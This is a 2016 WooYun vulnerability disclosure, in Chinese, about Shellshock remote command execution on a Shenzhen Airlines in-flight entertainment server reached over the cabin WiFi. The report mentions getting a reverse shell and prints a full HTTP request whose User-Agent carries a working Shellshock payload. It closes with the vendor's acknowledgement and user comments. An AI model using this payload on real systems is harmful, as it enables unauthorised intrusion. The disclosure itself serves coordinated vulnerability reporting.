当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205125

漏洞标题:深圳航空某机上系统可被控制获得服务器权限

相关厂商:深圳航空

漏洞作者: Smilent

提交时间:2016-05-05 08:41

修复时间:2016-06-19 14:20

公开时间:2016-06-19 14:20

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

简要描述:

深圳航空某机上系统存在远程命令执行,可获取服务器权限
声明:本文内容仅为证明漏洞危害,未对系统进行破坏。该漏洞不影响飞行安全。

详细说明:

连上机上WIFI后可获得一个内网ip 192.168.3.*
机上娱乐平台ip为192.168.3.1/192.168.2.99 ,有两张网卡。
发现漏洞主机,存在cgi远程命令执行。可直接反弹shell,获取服务器权限。
通过UA可以执行命令

00.png


01.png


查看版本

05.png


反弹shell

02.png


03.png


发现配置文件

04.png


做了限制,但是可以通过本机代理访问phpmyadmin等。由于,飞机正在下降,空姐叫我关闭电脑,就没有继续深入了。服务器版本为CentOS5.5 内核为2.6.18-194,应该可以提权,由于时间问题,为深入。

漏洞证明:

GET /cgi-bin/test-cgi HTTP/1.1
Host: 192.168.3.1:8080
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/uname -a;
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: PHPSESSID=cb49943gkbpjccfgogfjc7m8u4

修复方案:

升级bash

版权声明:转载请注明来源 Smilent@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-05 14:17

厂商回复:

感谢您对深航信息系统的关注和帮助,我们将尽快排查程序修补漏洞

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-05 10:01 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)

    我服

  2. 2016-05-05 10:04 | JoyChou ( 路人 | Rank:22 漏洞数:6 | 无)

    我服

  3. 2016-05-05 10:12 | Ano_Tom 认证白帽子 ( 普通白帽子 | Rank:474 漏洞数:47 | Talk is cheap.:)

    666

  4. 2016-05-05 13:49 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗,任何自称HackBrai...)

    999

  5. 2016-05-05 15:34 | arnoxia ( 实习白帽子 | Rank:33 漏洞数:12 | 一只菜鸟,正要飞)

    我服

  6. 2016-05-05 17:15 | Orvilla ( 路人 | Rank:4 漏洞数:1 | 菜逼来学习)

    我服